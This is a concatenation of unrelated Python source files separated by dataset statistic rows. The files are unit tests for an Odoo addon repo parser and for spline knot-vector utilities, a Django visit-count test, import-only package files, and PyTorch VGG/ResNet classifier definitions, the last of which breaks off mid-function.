    self.assertEqual(self.repo.branch, '8.0')
    self.assertEqual(self.repo.organization, DEFAULT_ORGANIZATION)
    self.assertEqual(self.repo.repository, 'connector')
    self.assertEqual(self.repo.git_repo_host, 'github.com')
    self.assertEqual(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_organization_and_repo_and_branch(self):
    """'org/repo branch' yields organization, repository and branch."""
    remote_url = 'OCA/connector 8.0'
    self.repo = Repo(remote_url)
    # assertEqual: assertEquals is a deprecated alias removed in Python 3.12
    self.assertEqual(self.repo.remote_url, remote_url)
    self.assertEqual(self.repo.folder_name, 'connector')
    self.assertEqual(self.repo.branch, '8.0')
    self.assertEqual(self.repo.organization, DEFAULT_ORGANIZATION)
    self.assertEqual(self.repo.repository, 'connector')
    self.assertEqual(self.repo.git_repo_host, 'github.com')
    self.assertEqual(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_url_and_branch(self):
    """'url branch' yields all URL-derived attributes plus the branch."""
    remote_url = 'https://github.com/OCA/connector 8.0'
    self.repo = Repo(remote_url)
    # assertEqual: assertEquals is a deprecated alias removed in Python 3.12
    self.assertEqual(self.repo.remote_url, remote_url)
    self.assertEqual(self.repo.folder_name, 'connector')
    self.assertEqual(self.repo.branch, '8.0')
    self.assertEqual(self.repo.organization, DEFAULT_ORGANIZATION)
    self.assertEqual(self.repo.repository, 'connector')
    self.assertEqual(self.repo.git_repo_host, 'github.com')
    self.assertEqual(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_rename_and_url(self):
    """A leading rename token overrides the checkout folder name."""
    remote_url = 'connector_rename https://github.com/OCA/connector'
    self.repo = Repo(remote_url)
    # assertEqual: assertEquals is a deprecated alias removed in Python 3.12
    self.assertEqual(self.repo.remote_url, remote_url)
    self.assertEqual(self.repo.folder_name, 'connector_rename')
    self.assertEqual(self.repo.branch, None)
    self.assertEqual(self.repo.organization, DEFAULT_ORGANIZATION)
    self.assertEqual(self.repo.repository, 'connector')
    self.assertEqual(self.repo.git_repo_host, 'github.com')
    self.assertEqual(self.repo.path, '%sconnector_rename' % (EXTRA_ADDONS_PATH, ))
def test_repo_rename_and_url_and_branch(self):
    """'rename url branch' sets folder name, URL attributes and branch."""
    remote_url = 'connector_rename https://github.com/OCA/connector 8.0'
    self.repo = Repo(remote_url)
    # assertEqual: assertEquals is a deprecated alias removed in Python 3.12
    self.assertEqual(self.repo.remote_url, remote_url)
    self.assertEqual(self.repo.folder_name, 'connector_rename')
    self.assertEqual(self.repo.branch, '8.0')
    self.assertEqual(self.repo.organization, DEFAULT_ORGANIZATION)
    self.assertEqual(self.repo.repository, 'connector')
    self.assertEqual(self.repo.git_repo_host, 'github.com')
    self.assertEqual(self.repo.path, '%sconnector_rename' % (EXTRA_ADDONS_PATH, ))
def test_repo_rename_and_url_and_branch_new(self):
    """A rename equal to the repository name is handled like any rename."""
    remote_url = 'account-financial-reporting https://github.com/OCA/account-financial-reporting 8.0'
    self.repo = Repo(remote_url)
    # assertEqual: assertEquals is a deprecated alias removed in Python 3.12
    self.assertEqual(self.repo.remote_url, remote_url)
    self.assertEqual(self.repo.folder_name, 'account-financial-reporting')
    self.assertEqual(self.repo.branch, '8.0')
    self.assertEqual(self.repo.organization, DEFAULT_ORGANIZATION)
    self.assertEqual(self.repo.repository, 'account-financial-reporting')
    self.assertEqual(self.repo.git_repo_host, 'github.com')
    self.assertEqual(self.repo.path, '%saccount-financial-reporting' % (EXTRA_ADDONS_PATH, ))
def test_download_cmd(self):
    """The clone command targets the repo's .git URL and addons path."""
    repo = Repo('Elico-Corp/odoo')
    expected = [
        'git', 'clone',
        'https://github.com/Elico-Corp/odoo.git',
        '/mnt/data/additional_addons/odoo',
    ]
    self.assertEqual(expected, repo.download_cmd)
def test_download_cmd_with_branch(self):
    """A branch spec adds '-b <branch>' to the clone command."""
    repo = Repo('Elico-Corp/odoo 8.0')
    expected = [
        'git', 'clone', '-b', '8.0',
        'https://github.com/Elico-Corp/odoo.git',
        '/mnt/data/additional_addons/odoo',
    ]
    self.assertEqual(expected, repo.download_cmd)
# Allow running this test module directly: python <this_file>.py
if __name__ == '__main__':
    unittest.main()
| 48.077844
| 105
| 0.692863
| 987
| 8,029
| 5.419453
| 0.074975
| 0.148065
| 0.287904
| 0.345485
| 0.916059
| 0.90802
| 0.888764
| 0.867639
| 0.865208
| 0.862965
| 0
| 0.004727
| 0.183211
| 8,029
| 166
| 106
| 48.36747
| 0.810918
| 0.013576
| 0
| 0.736111
| 0
| 0.006944
| 0.145781
| 0.021981
| 0
| 0
| 0
| 0
| 0.569444
| 1
| 0.111111
| false
| 0
| 0.013889
| 0
| 0.131944
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a4d7d60fb8beb501b8ba03ee0c2e9f84dc57af38
| 680
|
py
|
Python
|
tests/unit/test_rules_visitcount.py
|
torchbox/wagtail-personalisation
|
fdc2b971943cd24dca2d325604e35b56b5858d0d
|
[
"MIT"
] | 1
|
2020-04-25T06:23:02.000Z
|
2020-04-25T06:23:02.000Z
|
tests/unit/test_rules_visitcount.py
|
torchbox/wagtail-personalisation
|
fdc2b971943cd24dca2d325604e35b56b5858d0d
|
[
"MIT"
] | 3
|
2017-10-20T11:29:42.000Z
|
2019-09-26T07:38:05.000Z
|
tests/unit/test_rules_visitcount.py
|
torchbox/wagtail-personalisation
|
fdc2b971943cd24dca2d325604e35b56b5858d0d
|
[
"MIT"
] | 1
|
2017-11-09T08:30:28.000Z
|
2017-11-09T08:30:28.000Z
|
import pytest
@pytest.mark.django_db
def test_visit_count(site, client):
    """Session 'visit_count' tracks per-path request totals in order."""
    def visit(path):
        # Request the path and return the session's visit bookkeeping.
        resp = client.get(path)
        assert resp.status_code == 200
        return client.session['visit_count']

    counts = visit('/')
    assert counts[0]['path'] == '/'
    assert counts[0]['count'] == 1

    counts = visit('/')
    assert counts[0]['path'] == '/'
    assert counts[0]['count'] == 2

    counts = visit('/page-1/')
    assert counts[0]['count'] == 2
    assert counts[1]['count'] == 1
| 29.565217
| 47
| 0.654412
| 90
| 680
| 4.744444
| 0.255556
| 0.30445
| 0.224824
| 0.199063
| 0.758782
| 0.758782
| 0.742389
| 0.742389
| 0.742389
| 0.742389
| 0
| 0.035971
| 0.182353
| 680
| 22
| 48
| 30.909091
| 0.732014
| 0
| 0
| 0.666667
| 0
| 0
| 0.107353
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
102e73a682e3f41acc7ebd5562cc5604ffd36615
| 90
|
py
|
Python
|
conan/tools/qbs/__init__.py
|
Erlkoenig90/conan
|
da8de69618d75da5ac7d77e0eb7a38ee4d564eb9
|
[
"MIT"
] | null | null | null |
conan/tools/qbs/__init__.py
|
Erlkoenig90/conan
|
da8de69618d75da5ac7d77e0eb7a38ee4d564eb9
|
[
"MIT"
] | null | null | null |
conan/tools/qbs/__init__.py
|
Erlkoenig90/conan
|
da8de69618d75da5ac7d77e0eb7a38ee4d564eb9
|
[
"MIT"
] | null | null | null |
from conan.tools.qbs.qbstoolchain import QbsToolchain
from conan.tools.qbs.qbs import Qbs
| 30
| 53
| 0.844444
| 14
| 90
| 5.428571
| 0.428571
| 0.236842
| 0.368421
| 0.447368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 90
| 2
| 54
| 45
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
107a68f8e23fb7c1bfcb5d122e2cfd58856b79cd
| 15,529
|
py
|
Python
|
tests/test_SplineUsefulFunctions.py
|
carlos-adir/FEM-Nurbs
|
0c63d736fe6b49b0aec3f0a63573548eae8b65f2
|
[
"MIT"
] | null | null | null |
tests/test_SplineUsefulFunctions.py
|
carlos-adir/FEM-Nurbs
|
0c63d736fe6b49b0aec3f0a63573548eae8b65f2
|
[
"MIT"
] | null | null | null |
tests/test_SplineUsefulFunctions.py
|
carlos-adir/FEM-Nurbs
|
0c63d736fe6b49b0aec3f0a63573548eae8b65f2
|
[
"MIT"
] | null | null | null |
import pytest
# import unittest
import numpy as np
import femnurbs.SplineUsefulFunctions as SUF
def test_isValidU():
    """isValidU rejects malformed knot vectors and accepts valid ones."""
    with pytest.raises(TypeError):
        SUF.isValidU()
    rejected = [
        0, 1.2, {}, -1, {1: 1},
        [0, 0, 0, 1, 1],
        [0, 0, 1, 1, 1, ],
        [0, 0, 0, 0, 1, 1, 1],
        [0, 0, 0, 1, 1, 1, 1],
        [-1, -1, 1, 1],
        [0, 0, 2, 2],
        [0, 0, 0.8, 0.2, 1, 1],
        [0, 0, 0, 1, 0.5, 1, 1],
        [0, 0, 0.5, 0.5, 0.5, 1, 1],
    ]
    for candidate in rejected:
        assert SUF.isValidU(candidate) is False
    accepted = [
        [0, 0, 1, 1],
        [0, 0, 0, 1, 1, 1],
        [0, 0, 0, 0, 1, 1, 1, 1],
        [0, 0, 0.2, 0.8, 1, 1],
        [0, 0, 0, 0.5, 1, 1, 1],
        [0, 0, 0.1, 0.5, 0.9, 1, 1],
        [0, 0, 0.5, 0.5, 1, 1],
    ]
    for candidate in accepted:
        assert SUF.isValidU(candidate) is True
def test_UBezier():
    """UBezier returns valid knot vectors of the expected Bezier layout."""
    for degree in range(1, 10):
        assert SUF.isValidU(SUF.UBezier(p=degree)) is True
    expected = {
        1: [0, 0, 1, 1],
        2: [0, 0, 0, 1, 1, 1],
        3: [0, 0, 0, 0, 1, 1, 1, 1],
    }
    for degree, Ugood in expected.items():
        np.testing.assert_almost_equal(np.array(Ugood), SUF.UBezier(p=degree))
def test_UUniform():
    """UUniform is valid for many (p, n) and matches explicit vectors."""
    for degree in range(1, 10):
        for npts in range(degree + 1, 11):
            assert SUF.isValidU(SUF.UUniform(p=degree, n=npts)) is True
    cases = [
        (1, 2, [0, 0, 1, 1]),
        (1, 3, [0, 0, 0.5, 1, 1]),
        (1, 5, [0, 0, 0.25, 0.5, 0.75, 1, 1]),
        (1, 6, [0, 0, 0.2, 0.4, 0.6, 0.8, 1, 1]),
        (2, 3, [0, 0, 0, 1, 1, 1]),
        (2, 4, [0, 0, 0, 0.5, 1, 1, 1]),
        (2, 6, [0, 0, 0, 0.25, 0.5, 0.75, 1, 1, 1]),
        (2, 7, [0, 0, 0, 0.2, 0.4, 0.6, 0.8, 1, 1, 1]),
        (3, 4, [0, 0, 0, 0, 1, 1, 1, 1]),
        (3, 5, [0, 0, 0, 0, 0.5, 1, 1, 1, 1]),
        (3, 7, [0, 0, 0, 0, 0.25, 0.5, 0.75, 1, 1, 1, 1]),
        (3, 8, [0, 0, 0, 0, 0.2, 0.4, 0.6, 0.8, 1, 1, 1, 1]),
    ]
    for degree, npts, Ugood in cases:
        np.testing.assert_almost_equal(
            np.array(Ugood), SUF.UUniform(p=degree, n=npts))
def test_URandom():
    """Random knot vectors are valid and report their own p and n."""
    trials = 100
    for degree in (1, 2, 3):
        for npts in range(degree + 1, 30):
            for _ in range(trials):
                U = SUF.URandom(p=degree, n=npts)
                assert SUF.isValidU(U) is True
                assert SUF.getPfromU(U) == degree
                assert SUF.getNfromU(U) == npts
def test_transpose():
    """transpose leaves identity matrices unchanged (both diagonals)."""
    for size in (3, 4):
        II = np.eye(size)
        np.testing.assert_almost_equal(SUF.transpose(II), II)
    for size in (3, 4):
        II = np.eye(size)
        np.testing.assert_almost_equal(SUF.transpose(II, diagonal=2), II)
def test_isSymetric():
    """isSymetric on identities and explicit 2-row diagonal-2 examples."""
    for size in (3, 4):
        assert SUF.isSymetric(np.eye(size)) is True
        assert SUF.isSymetric(np.eye(size), diagonal=2) is True
    symmetric = [
        [[1, 2, 3, 4], [4, 3, 2, 1]],
        [[1, 2, 4, 4], [4, 4, 2, 1]],
    ]
    for rows in symmetric:
        assert SUF.isSymetric(np.array(rows), diagonal=2) is True
    asymmetric = [
        [[7, 2, 4, 3], [4, 4, 2, 7]],
        [[7, 2, 4, 7], [7, 4, 2, 3]],
    ]
    for rows in asymmetric:
        assert SUF.isSymetric(np.array(rows), diagonal=2) is False
def test_getPfromU():
    """getPfromU recovers the degree from Bezier, uniform and ad-hoc U."""
    for degree in (1, 2, 3, 4):
        assert SUF.getPfromU(SUF.UBezier(p=degree)) == degree
    for degree in (1, 2, 3, 4):
        assert SUF.getPfromU(SUF.UUniform(p=degree, n=6)) == degree
    U = np.array([0, 0, 0, 0.2, 0.8, 1, 1, 1])
    assert SUF.getPfromU(U) == 2
def test_getNfromU():
    """getNfromU recovers the point count from Bezier, uniform and ad-hoc U."""
    for degree, ngood in [(1, 2), (2, 3), (3, 4), (4, 5)]:
        assert SUF.getNfromU(SUF.UBezier(p=degree)) == ngood
    for degree in (1, 2, 3, 4):
        assert SUF.getNfromU(SUF.UUniform(p=degree, n=6)) == 6
    U = np.array([0, 0, 0, 0.2, 0.8, 1, 1, 1])
    assert SUF.getNfromU(U) == 5
def test_transformUtoH():
    """transformUtoH: interval widths, with and without the j argument."""
    U_p2n5 = np.array([0, 0, 0, 0.2, 0.8, 1, 1, 1])            # p = 2 and n = 5
    U_p3n6 = np.array([0, 0, 0, 0, 0.2, 0.8, 1, 1, 1, 1])      # p = 3 and n = 6
    default_cases = [
        (SUF.UBezier(p=1), [1]),
        (SUF.UBezier(p=2), [0, 1, 0]),
        (SUF.UBezier(p=3), [0, 0, 1, 0, 0]),
        (SUF.UBezier(p=4), [0, 0, 0, 1, 0, 0, 0]),
        (SUF.UUniform(p=1, n=6), [0.2, 0.2, 0.2, 0.2, 0.2]),
        (SUF.UUniform(p=2, n=6), [0, 0.25, 0.25, 0.25, 0.25, 0]),
        (SUF.UUniform(p=3, n=6), np.array([0, 0, 1, 1, 1, 0, 0]) / 3),
        (SUF.UUniform(p=4, n=6), np.array([0, 0, 0, 1, 1, 0, 0, 0]) / 2),
        (U_p2n5, [0, 0.2, 0.6, 0.2, 0]),
        (U_p3n6, [0, 0, 0.2, 0.6, 0.2, 0, 0]),
    ]
    for U, Hgood in default_cases:
        np.testing.assert_almost_equal(np.array(Hgood), SUF.transformUtoH(U))
    windowed_cases = [
        (SUF.UBezier(p=2), 0, [1]),
        (SUF.UBezier(p=2), 1, [1]),
        (SUF.UBezier(p=3), 0, [1]),
        (SUF.UBezier(p=3), 1, [1]),
        (SUF.UBezier(p=3), 2, [0, 1, 0]),
        (SUF.UBezier(p=4), 0, [1]),
        (SUF.UBezier(p=4), 1, [1]),
        (SUF.UBezier(p=4), 2, [0, 1, 0]),
        (SUF.UBezier(p=4), 3, [0, 0, 1, 0, 0]),
        (SUF.UUniform(p=1, n=6), 0, [0.2, 0.2, 0.2, 0.2, 0.2]),
        (SUF.UUniform(p=2, n=6), 0, [0.25, 0.25, 0.25, 0.25]),
        (SUF.UUniform(p=2, n=6), 1, [0.25, 0.25, 0.25, 0.25]),
        (SUF.UUniform(p=3, n=6), 0, np.array([1, 1, 1]) / 3),
        (SUF.UUniform(p=3, n=6), 1, np.array([1, 1, 1]) / 3),
        (SUF.UUniform(p=3, n=6), 2, np.array([0, 1, 1, 1, 0]) / 3),
        (SUF.UUniform(p=4, n=6), 0, np.array([1, 1]) / 2),
        (SUF.UUniform(p=4, n=6), 1, np.array([1, 1]) / 2),
        (SUF.UUniform(p=4, n=6), 2, np.array([0, 1, 1, 0]) / 2),
        (SUF.UUniform(p=4, n=6), 3, np.array([0, 0, 1, 1, 0, 0]) / 2),
        (U_p2n5, 1, [0.2, 0.6, 0.2]),
        (U_p3n6, 1, [0.2, 0.6, 0.2]),
        (U_p3n6, 2, [0, 0.2, 0.6, 0.2, 0]),
    ]
    for U, j, Hgood in windowed_cases:
        np.testing.assert_almost_equal(
            np.array(Hgood), SUF.transformUtoH(U, j=j))
def test_transformHtoSides():
    """transformHtoSides: neighbour intervals normalised by the middle one."""
    cases = [
        ([1, 1, 1], [[1], [1]]),
        ([0, 1, 1], [[0], [1]]),
        ([1, 1, 0], [[1], [0]]),
        ([0, 1, 0], [[0], [0]]),
        ([0.6, 1, 0.3], [[0.6], [0.3]]),
        ([6, 10, 3], [[0.6], [0.3]]),
        ([1, 1, 1, 1, 1], [[1, 1], [1, 1]]),
        ([0, 1, 1, 1, 1], [[1, 0], [1, 1]]),
        ([1, 1, 1, 1, 0], [[1, 1], [1, 0]]),
        ([0, 0, 1, 0, 0], [[0, 0], [0, 0]]),
        ([0.2, 0.6, 1, 0.3, 0.4], [[0.6, 0.2], [0.3, 0.4]]),
        ([2, 6, 10, 3, 4], [[0.6, 0.2], [0.3, 0.4]]),
    ]
    for H, Sgood in cases:
        Stest = SUF.transformHtoSides(np.array(H))
        np.testing.assert_almost_equal(np.array(Sgood), Stest)
def test_cutHtoElementZ():
    """cutHtoElementZ slices the interval vector around element index."""
    cases = [
        ([0.5, 0.5], 0, [0.5]),
        ([0.5, 0.5], 1, [0.5]),
        ([0, 0.5, 0.5, 0], 0, [0, 0.5, 0.5]),
        ([0, 0.5, 0.5, 0], 1, [0.5, 0.5, 0]),
        ([0, 0, 0.5, 0.5, 0, 0], 0, [0, 0, 0.5, 0.5, 0]),
        ([0, 0, 0.5, 0.5, 0, 0], 1, [0, 0.5, 0.5, 0, 0]),
    ]
    for H, element, Zgood in cases:
        Ztest = SUF.cutHtoElementZ(np.array(H), element)
        np.testing.assert_almost_equal(np.array(Zgood), Ztest)
def test_isDiagonalDominant():
    """isDiagonalDominant on identity, flat and perturbed matrices."""
    cases = [
        (np.eye(3), True),
        (np.ones((3, 3)), False),
        (np.zeros((3, 3)), False),
        (np.eye(3) - (1 / 3), False),
        (1.0001 * np.eye(3) - (1 / 3), True),
    ]
    for M, expected in cases:
        assert SUF.isDiagonalDominant(M) is expected
# def main():
# unittest.main()
# if __name__ == "__main__":
# main()
| 29.749042
| 72
| 0.567905
| 2,638
| 15,529
| 3.283169
| 0.030705
| 0.030943
| 0.119501
| 0.167302
| 0.93107
| 0.926452
| 0.899319
| 0.869184
| 0.820113
| 0.76042
| 0
| 0.079512
| 0.261382
| 15,529
| 521
| 73
| 29.806142
| 0.675588
| 0.010625
| 0
| 0.69898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.321429
| 1
| 0.030612
| false
| 0
| 0.007653
| 0
| 0.038265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10a17043fe87b2ca60ade27d6089e2c7e75b443e
| 170
|
py
|
Python
|
ffai/ai/bots/testbots/__init__.py
|
tysen2k/ffai
|
2fa1fd45a8877986fdb21e3fea5e01cbf819d3ec
|
[
"Apache-2.0"
] | null | null | null |
ffai/ai/bots/testbots/__init__.py
|
tysen2k/ffai
|
2fa1fd45a8877986fdb21e3fea5e01cbf819d3ec
|
[
"Apache-2.0"
] | null | null | null |
ffai/ai/bots/testbots/__init__.py
|
tysen2k/ffai
|
2fa1fd45a8877986fdb21e3fea5e01cbf819d3ec
|
[
"Apache-2.0"
] | null | null | null |
from .crash_bot import *
from .idle_bot import *
from .init_crash_bot import *
from .just_in_time_bot import *
from .manipulator_bot import *
from .violator_bot import *
| 24.285714
| 31
| 0.788235
| 27
| 170
| 4.62963
| 0.407407
| 0.432
| 0.52
| 0.288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141176
| 170
| 6
| 32
| 28.333333
| 0.856164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
52a5c36aef078acb6e645ea1893458ad86ef9085
| 27,985
|
py
|
Python
|
mephistopheies/kaggle_camera_model_id_lib/kaggle_camera_model_id_lib/models/models.py
|
cortwave/camera-model-identification
|
b2cbac93308bd6e1bc9d38391f5e97f48da99263
|
[
"BSD-2-Clause"
] | 6
|
2018-02-09T11:40:29.000Z
|
2021-06-14T06:08:50.000Z
|
mephistopheies/kaggle_camera_model_id_lib/kaggle_camera_model_id_lib/models/models.py
|
cortwave/camera-model-identification
|
b2cbac93308bd6e1bc9d38391f5e97f48da99263
|
[
"BSD-2-Clause"
] | null | null | null |
mephistopheies/kaggle_camera_model_id_lib/kaggle_camera_model_id_lib/models/models.py
|
cortwave/camera-model-identification
|
b2cbac93308bd6e1bc9d38391f5e97f48da99263
|
[
"BSD-2-Clause"
] | 7
|
2018-02-09T11:41:11.000Z
|
2021-06-14T06:08:52.000Z
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
import pretrainedmodels
from pretrainedmodels.models.inceptionresnetv2 import BasicConv2d, Mixed_5b, Block35, Block17, Block8
from pretrainedmodels.models.inceptionresnetv2 import Mixed_6a, Mixed_7a
# Factory callables for ImageNet-pretrained torchvision ResNet backbones,
# keyed by model name; lambdas defer the (slow) weight download to call time.
resnets = {
    'resnet18': lambda: models.resnet18(pretrained=True),
    'resnet34': lambda: models.resnet34(pretrained=True),
    'resnet50': lambda: models.resnet50(pretrained=True),
    'resnet101': lambda: models.resnet101(pretrained=True),
    'resnet152': lambda: models.resnet152(pretrained=True)
}
# VGG layer configurations ('M' = max pool, int = conv output channels),
# in the torchvision style: A=vgg11, B=vgg13, D=vgg16, E=vgg19.
# 'E_2b' / 'E_3b' are truncated vgg19 trunks (first 2 / 3 blocks only).
cfg = {
    'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
    'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
    'E_2b': [64, 64, 'M', 128, 128, 'M'],
    'E_3b': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M']
}
# Pretrained VGG factories matching each cfg key (plain variants).
cfg_vgg_map = {
    'A': lambda: models.vgg11(pretrained=True),
    'B': lambda: models.vgg13(pretrained=True),
    'D': lambda: models.vgg16(pretrained=True),
    'E': lambda: models.vgg19(pretrained=True),
    'E_2b': lambda: models.vgg19(pretrained=True),
    'E_3b': lambda: models.vgg19(pretrained=True)
}
# Pretrained VGG factories matching each cfg key (batch-norm variants).
cfg_vgg_bn_map = {
    'A': lambda: models.vgg11_bn(pretrained=True),
    'B': lambda: models.vgg13_bn(pretrained=True),
    'D': lambda: models.vgg16_bn(pretrained=True),
    'E': lambda: models.vgg19_bn(pretrained=True),
    'E_2b': lambda: models.vgg19_bn(pretrained=True),
    'E_3b': lambda: models.vgg19_bn(pretrained=True)
}
def make_layers_vgg(cfg, batch_norm=False):
    """Build the VGG feature trunk described by *cfg*.

    'M' entries become 2x2 max pooling; integer entries become 3x3
    convolutions (optionally followed by BatchNorm2d) plus ReLU.
    The input is assumed to have 3 channels (RGB).
    """
    modules = []
    channels = 3
    for spec in cfg:
        if spec == 'M':
            modules.append(nn.MaxPool2d(kernel_size=2, stride=2))
            continue
        modules.append(nn.Conv2d(channels, spec, kernel_size=3, padding=1))
        if batch_norm:
            modules.append(nn.BatchNorm2d(spec))
        modules.append(nn.ReLU(inplace=True))
        channels = spec
    return nn.Sequential(*modules)
class VggHead(nn.Module):
    """VGG trunk (optionally with transferred pretrained weights) followed
    by a fully convolutional classifier head (1x1 conv + BN + ReLU + GAP).
    """

    def _transfer_vgg_head(self, vgg_key, load_vgg_bn=False, batch_norm=False):
        # Build the trunk from the module-level `cfg` table, then copy
        # matching pretrained weights; state-dict keys not present in the
        # (possibly truncated) trunk are dropped by the key filter.
        self.vgg = make_layers_vgg(cfg[vgg_key], batch_norm=batch_norm)
        if load_vgg_bn:
            if batch_norm:
                vgg = cfg_vgg_bn_map[vgg_key]()
            else:
                vgg = cfg_vgg_map[vgg_key]()
            keys = set(self.vgg.state_dict().keys())
            self.vgg.load_state_dict(dict([(k, v) for (k, v) in vgg.features.state_dict().items() if k in keys]))

    def _create_classifier(self, in_filters, num_classes):
        # 1x1 conv projects trunk features directly to class scores.
        self.project = nn.Conv2d(
            in_filters, num_classes,
            kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
            bias=True)
        self.bn = nn.BatchNorm2d(num_classes)
        self.relu = nn.ReLU(inplace=True)
        self.avgpool = nn.AdaptiveAvgPool2d(1)

    def __init__(self, vgg_key, batch_norm=True, num_classes=10, load_vgg_bn=False):
        super(VggHead, self).__init__()
        self._transfer_vgg_head(load_vgg_bn=load_vgg_bn, vgg_key=vgg_key, batch_norm=batch_norm)
        # cfg[vgg_key][-2] is the channel count of the trunk's last conv
        # (the final cfg entry is always 'M').
        self._create_classifier(cfg[vgg_key][-2], num_classes)

    def forward(self, x):
        """Return class scores of shape (batch, num_classes)."""
        x = self.vgg(x)
        x = self.project(x)
        x = self.bn(x)
        x = self.relu(x)
        x = self.avgpool(x)
        x = x.view(x.shape[0], x.shape[1])
        return x
class StyleVggHead(VggHead):
    """VGG head classifying on Gram-matrix (style) statistics.

    The normalised Gram matrix of the trunk's feature maps, reduced to
    its strict upper triangle, is fed to a fully connected stack instead
    of VggHead's 1x1-conv classifier.
    """

    def _create_classifier(self, in_filters, num_classes=None):
        """Build the FC classifier.

        Bug fix: the original signature took only ``num_classes``, but the
        parent ``__init__`` calls ``_create_classifier(in_filters,
        num_classes)`` with two positional arguments, which raised
        TypeError. The input width here is fixed by the Gram-triangle
        size, so ``in_filters`` is accepted but unused.
        """
        if num_classes is None:
            # Tolerate the legacy single-argument call style.
            num_classes = in_filters
        # 8128 = 128 * 127 / 2, the strict upper triangle of a 128x128
        # Gram matrix; assumes the trunk ends with 128 channels
        # (e.g. vgg_key 'E_2b') — TODO confirm against callers.
        self.fc1 = nn.Linear(8128, 4096)
        self.bn1 = nn.BatchNorm1d(4096)
        self.relu = nn.ReLU(inplace=True)
        self.fc2 = nn.Linear(4096, 2048)
        self.bn2 = nn.BatchNorm1d(2048)
        self.fc3 = nn.Linear(2048, num_classes)

    def __init__(self, vgg_key, batch_norm=True, num_classes=10, load_vgg_bn=False):
        # Bug fix: the original passed num_classes positionally into the
        # vgg_key slot AND gave vgg_key as a keyword, raising
        # TypeError ("got multiple values for argument 'vgg_key'").
        super(StyleVggHead, self).__init__(
            vgg_key,
            num_classes=num_classes,
            load_vgg_bn=load_vgg_bn,
            batch_norm=batch_norm)
        # The parent __init__ already built the classifier through the
        # overridden _create_classifier; no second call is needed.

    def forward(self, x):
        """Classify x from its Gram-matrix (style) representation."""
        x = self.vgg(x)
        (b, c, h, w) = x.shape
        x = x.view(b, c, w * h)
        # Normalised Gram matrix of the flattened feature maps.
        x = x.bmm(x.transpose(1, 2)) / (c * h * w)
        # Concatenate the strict upper-triangle diagonals per sample.
        x = torch.stack(
            [torch.cat([torch.diag(x[j, :], i) for i in range(1, x.shape[1])])
             for j in range(x.shape[0])])
        x = self.fc1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.fc2(x)
        x = self.bn2(x)
        x = self.relu(x)
        x = self.fc3(x)
        return x
class IEEEfcn(nn.Module):
    """Small fully convolutional classifier (conv/SELU/pool stages, a 1x1
    projection to class scores, and global average pooling)."""

    def _initialize_weights(self):
        # He-style normal init for convs; unit/zero init for batch norms;
        # small-variance init for any linear layers.
        for module in self.modules():
            if isinstance(module, nn.Conv2d):
                fan_out = module.kernel_size[0] * module.kernel_size[1] * module.out_channels
                module.weight.data.normal_(0, math.sqrt(2. / fan_out))
                if module.bias is not None:
                    module.bias.data.zero_()
            elif isinstance(module, nn.BatchNorm2d):
                module.weight.data.fill_(1)
                module.bias.data.zero_()
            elif isinstance(module, nn.Linear):
                module.weight.data.normal_(0, 0.01)
                module.bias.data.zero_()

    def __init__(self, num_classes=10):
        super(IEEEfcn, self).__init__()
        stages = []
        # Three conv -> SELU -> 2x2 max-pool stages.
        for c_in, c_out, k in [(3, 32, 4), (32, 48, 5), (48, 64, 5)]:
            stages += [
                nn.Conv2d(c_in, c_out, kernel_size=(k, k), stride=1),
